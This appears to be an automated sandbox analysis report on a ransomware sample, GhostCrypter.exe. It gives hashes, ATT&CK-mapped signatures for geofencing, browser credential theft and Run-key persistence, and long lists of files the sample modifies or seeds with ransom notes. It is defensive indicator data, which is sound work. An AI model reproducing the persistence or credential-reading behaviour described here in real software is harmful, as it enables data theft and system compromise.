c2bf26d1b3a311be1bec839ca7c26bf2c944fd79333485a271230ec435c318dd

Analysis

max time kernel
148s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
02/03/2024, 20:19

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Ransomware/GhostCrypter.exe
Size

87KB
MD5

d60b0083605a9fb10b4d21005f1febd0
SHA1

ed538f9dc4a7b58649d55b892e4a32cfb25b98a1
SHA256

eae568e1a06b6dd762c92a8e0be5349c0c474ff429785fdad7d58083a10485de
SHA512

4c8b4e93685852cc4634f2cc2bd66ff86b2e133b9f6899441488b630569c26832eab07b08ced87b62031749969bb9c0d2e1fd229071213ed71eeaa9f27fb87cb
SSDEEP

1536:NcMqI3TJ38pY5GuncfTpgg5qKB3gg5bwFlG3zg4llJLmA+pVStv:Nck3TJ38pY5OfTpTpggSHGblzL8S

Score

8^/10

persistence spyware stealer

Malware Config

Signatures

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	GhostCrypter.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CMOgLXuK2BZqDuwz = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\GhostCrypter.exe\" /SkipReg"	GhostCrypter.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\es-ES\Licenses\OEM\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\es-ES\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms002.inf_amd64_2176cc45624119a9\prnms002.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\lipeula.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\Licenses\Volume\Professional\license.rtf	GhostCrypter.exe
File created	C:\Windows\SysWOW64\de-DE\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\LogFiles\WMI\Diagtrack-Listener.etl.007	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\Licenses\Volume\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\default.help.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms010.inf_amd64_9e410195c3b236c9\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\en-US\Licenses\_Default\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\SysWOW64\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc1bda6cf47380c\prnms001.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\System32\LogFiles\WMI\SpoolerLogger.etl.001	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\default.help.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_0e2452f597790e95\prnms003.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\Licenses\Volume\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\Licenses\OEM\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\Licenses\Volume\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\LogFiles\WMI\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\tsprint.inf_amd64_6066bc96a5f28b44\tsprint.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\Licenses\_Default\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\System32\LogFiles\WMI\Diagtrack-Listener.etl.003	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\profile.ps1	GhostCrypter.exe
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\Licenses\neutral\_Default\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms006.inf_amd64_c3bdcb6fc975b614\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\uk-UA\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\MailContactsCalendarSync\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc1bda6cf47380c\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\en-US\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms004.inf_amd64_c28ee88ec1bd4178\prnms004.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\Licenses\_Default\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\System32\LogFiles\WMI\Diagtrack-Listener.etl.001	GhostCrypter.exe
File created	C:\Windows\SysWOW64\Bthprops\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\uk-UA\Licenses\_Default\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\uk-UA\Licenses\OEM\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\default.help.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_x86_360f6f3a7c4b3433\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\Licenses\_Default\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_a7412a554c9bc1fd\prnms009.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\lpeula.rtf	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms002.inf_amd64_2176cc45624119a9\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_x86_c62e9f8067f98247\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ntprint4.inf_amd64_0958c7cad3cd6075\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\Licenses\OEM\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\Licenses\OEM\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\Licenses\neutral\OEM\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\Licenses\neutral\_Default\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\DefaultAccountTile.png	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\lpeula.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\WindowsCodecsRaw.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\Volume\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\uk-UA\Licenses\Volume\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\uk-UA\Licenses\_Default\Professional\license.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\SysWOW64\en-US\Licenses\_Default\Professional\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-80.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Coverage.ps1	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\Attribution\foreca.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-200_contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-150_contrast-black.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\bun.png	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_MoveNoDrop32x32.gif	GhostCrypter.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-black\MedTile.scale-125.png	GhostCrypter.exe
File created	C:\Program Files\Java\jre-1.8\lib\ext\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-125_contrast-black.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt_get.svg	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\BeOfType.Tests.ps1	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\Match.ps1	GhostCrypter.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\Internet Explorer\images\bing.ico	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\32.jpg	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppUpdate.svg	GhostCrypter.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPack2019Eula.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\subscription_intro\save-money.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-150.png	GhostCrypter.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example1.Diagnostics\Diagnostics\Simple\Example1.Diagnostics.Tests.ps1	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-400.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\iheart-radio.scale-200_contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\28.jpg	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookWideTile.scale-125.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-400.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageLargeTile.scale-150.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-48_altform-unplated_contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyShare-Dark.scale-125.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteLargeTile.scale-100.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyShare.scale-150.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-16_altform-unplated.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_AppList.scale-200.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\BreakAndContinue.Tests.ps1	GhostCrypter.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubAppList.scale-125_contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\15.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-100_contrast-black.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Sand.jpg	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-256.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-48.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-200_contrast-black.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif	GhostCrypter.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2Fluent.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubStoreLogo.scale-125_contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-256_altform-lightunplated_devicefamily-colorfulunplated.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_selected_18.svg	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\MedTile.scale-100.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-200.png	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif	GhostCrypter.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ko_135x40.svg	GhostCrypter.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-30_altform-unplated_contrast-black.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256_altform-unplated.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp2.scale-100.png	GhostCrypter.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-16_contrast-black.png	GhostCrypter.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare44x44.targetsize-64_altform-unplated_contrast-black.png	GhostCrypter.exe
File created	C:\Windows\WinSxS\amd64_netfx4-cfx_extended_sql_files_b03f5f7f11d50a3a_4.0.15805.0_none_7684544774e2621d\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\copyToClipboard.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.84_none_24f8aafdaceaf0b5\Square44x44Logo.targetsize-40_altform-unplated.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\SquareTile310x150.scale-400.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-miracast-receiver-api_31bf3856ad364e35_10.0.19041.746_none_e69b9d57778c9a12\@WirelessDisplayToast.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleLogo.scale-150_contrast-black.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_systemresource-wind..-ui-accountscontrol_31bf3856ad364e35_10.0.19041.1_none_8805ef3af31f4b8c\Generic.Theme-Dark_Scale-250.png	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\DefaultWsdlHelpGenerator.aspx	GhostCrypter.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.Shell\Images\LocationIcon.scale-400.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-audiodiagnostic_31bf3856ad364e35_10.0.19041.1_none_767880898f16fada\TS_APOLoadFailure.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.AccountsControl\Images\Advanced.Theme-Dark_Scale-125.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\NavOverFlow_Warning.png	GhostCrypter.exe
File opened for modification	C:\Windows\INF\wgencounter.PNF	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\AppConfig\DebugAndTrace.aspx	GhostCrypter.exe
File opened for modification	C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\YourPhoneCallingToast.scale-100_contrast-white.png	GhostCrypter.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-t..extservice-tigrinya_31bf3856ad364e35_10.0.19041.1_none_2863d34beb4a07ef\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\WiFiNetworkManagerToast.scale-200_contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleLogo.targetsize-60_altform-unplated.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\x86_netfx4-aspnet_webevent_sqlprov_b03f5f7f11d50a3a_4.0.15805.0_none_759b86bfc3994189\InstallWebEventSqlProvider.sql	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.1266_none_fb76f6fb7e78a373\InputApp\InputApp\Assets\SquareLogo150x150.scale-100.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\x86_netfx-aspnet_membership_sql_b03f5f7f11d50a3a_10.0.19041.1_none_2e4eb18be201931a\InstallMembership.sql	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-onecore-a..sibility-experience_31bf3856ad364e35_10.0.19041.1_none_41b27ed425707c3a\pin.svg	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_10.0.19041.1_de-de_09885a3ff45a5da9\lpeula.rtf	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-oobe-user_31bf3856ad364e35_10.0.19041.1_none_165c59d1f13fedf2\@WLOGO_48x48.png	GhostCrypter.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\NearShare.scale-150.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.19041.1266_none_802f96a5044b0fbe\DMR_120.jpg	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\Square44x44Logo.scale-200.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..ast-black.searchapp_31bf3856ad364e35_10.0.19041.1_none_e479c512c8bfeb66\MediumTile.scale-100.png	GhostCrypter.exe
File opened for modification	C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-80_contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\Assets\BadgeLogo.scale-200.png	GhostCrypter.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.AccountsControl\Images\Advanced.Theme-Dark_Scale-100.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\x86_netfx-aspnet_webadmin_security_b03f5f7f11d50a3a_10.0.19041.1_none_2374a09f9dec4491\security.aspx	GhostCrypter.exe
File created	C:\Windows\ImmersiveControlPanel\images\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_10.0.19041.1_it-it_3f23f962ad6356f3\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.Shell\Images\Icon_MMXresume.contrast-black_scale-125.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-bitsdiagnostic_31bf3856ad364e35_10.0.19041.1_none_023d0df5c3f06a00\RC_BITSDLL.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\Badge.contrast-white.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.19041.1_none_595f2a7acaf53bba\offline.png	GhostCrypter.exe
File created	C:\Windows\Boot\DVD\PCAT\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-speech-userexperience_31bf3856ad364e35_10.0.19041.746_none_fa033ad7aa9be481\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\Users\findUsers.aspx	GhostCrypter.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\images\AccountSmallLogo.png	GhostCrypter.exe
